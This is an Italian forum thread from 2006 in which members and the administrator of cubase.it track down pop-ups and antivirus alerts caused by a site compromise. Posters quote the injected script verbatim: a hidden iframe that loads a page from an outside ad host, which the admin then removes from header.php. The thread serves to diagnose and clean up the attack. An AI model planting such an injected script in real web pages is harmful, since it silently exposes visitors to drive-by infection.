Autore
|
Topic: POP UP in questo forum
|
|
PeterPa
Member
Member # 2257
|
posted 20. Giugno 2006 20:58
ripeto, io faccio "pulsante destro" + chiudi. ed il serpente,figlio di troia, muore con una mela in bocca. se lascio cubase.it sempre aperto non succede nulla. queste cose servono per far comprare anti spyware.
Messaggi: 3983 | Data Registrazione: Mag 2003
| IP: Logged
|
|
|
cubaser
Member
Member # 5766
|
posted 20. Giugno 2006 21:51
io adopero 3 pc per "cubasiITzzare" e su tutti e tre mi si è presentato il problema. 2 (portatili) hanno IE, il terzo, fisso ha firefox. su un portatile e sul fisso sono riuscito a eliminare il problema (non chiedetemi come, ho fatto più pulizie di una perpetua) sul secondo portatile ancora no. il bello è che se chiamo su google un topic e poi risalgo all'indice dei forum non succede nulla.
Messaggi: 17863 | Data Registrazione: Giu 2005
| IP: Logged
|
|
coach
Member
Member # 4750
|
posted 21. Giugno 2006 07:10
A me l'antivirus mi avvisa che codesto sito ha un virus dal nome strano e se lo voglio rimuovere
Messaggi: 1369 | Data Registrazione: Dic 2004
| IP: Logged
|
|
|
|
|
raffaello
Member
Member # 1794
|
posted 21. Giugno 2006 15:37
quote: Originally posted by MichyLee: Il problema risiede, sempre che non dica eresie, nella home e precisamente in tale script, presente nel codice sorgente: <script language=javascript>document.write(unescape('<iframe src=http://ad0299.vogservice.com/ie0509.htm WIDTH=1 BORDER=1 HEIGHT=1 style=display:none></IFRAME>'))</script>confermo è in questa riga : <script language=javascript>document.write(unescape('<iframe src=http://ad0299.vogservice.com/ie0509.htm WIDTH=1 BORDER=1 HEIGHT=1 style=display:none></IFRAME>'))</script> e quì c'è qualcosa che può interessare cj (mi sa che ti hanno hackerato il sito) http://www.mkportal.it/support/archive/index.php/t-11019.html
Cj, urge un controllo
Messaggi: 1699 | Data Registrazione: Gen 2003
| IP: Logged
|
|
cj
Administrator
Member # 236
|
posted 21. Giugno 2006 19:36
sono 36 ore che sto cercando di capire...ma non sono riuscito a farlo fino ad ora. Il file header.php (uno degli utlimi che ho controllato, ovvio) conteneva quella riga di codice bastarda...ora dovrebbe non esserci più.Ma ho letto ( http://forum.html.it/forum/showthread.php?threadid=987058 ) che potrebbe ritornare ed il tutto dovrebbe essere causato dal forum in php che fa parte del pacchetto di php-nuke ma che al momento è attivo solo per test amministrativi. non appena riapparisse qualcosa del genere potete segnalarmelo via email o qui, plis? a me quella riga non appare più nel codice, fatemi sapere bye cj
Messaggi: 13118 | Data Registrazione: Mar 2001
| IP: Logged
|
|
PeterPa
Member
Member # 2257
|
posted 21. Giugno 2006 21:08
ora 'nc'è sta chiù.
Messaggi: 3983 | Data Registrazione: Mag 2003
| IP: Logged
|
|
Arturio
Member
Member # 5337
|
posted 21. Giugno 2006 22:29
confermo,x il momento nn s'è fatto + vivo....
Messaggi: 859 | Data Registrazione: Mar 2005
| IP: Logged
|
|
|
tinc
Junior Member
Member # 7538
|
posted 22. Giugno 2006 10:09
confermo, non c'e' piu'!
Messaggi: 200 | Data Registrazione: Mag 2006
| IP: Logged
|
|
cj
Administrator
Member # 236
|
posted 22. Giugno 2006 12:15
quote: Originally posted by Kenny: Quindi scusate l'ignoranza...non è qualcosa che è nei nostri pc ma nel sito? O meglio NEI siti?A me qui è apparso solo una volta e ho scritto subito il topic perchè mi sembrava strano che fosse un pop up che ti chiedeva di comprare cubase e che fosse simile a quelli spuntatomi negli altri siti.....
è un cavallo di troia che attacca i buchi dei piccì con windows sfruttando una falla del sistema di pubblicazione delle pagine web. In pratica quest'ultima falla permette di scrivere la riga di codice citata e di conseguenza chi usa uno dei vari win (98, 2000, xp, etc.) si ritrova quel popup non proprio benevolo ed infatti segnalato come virus da chi ha un antivirus. colpe a metà, quindi. bye cj
Messaggi: 13118 | Data Registrazione: Mar 2001
| IP: Logged
|
|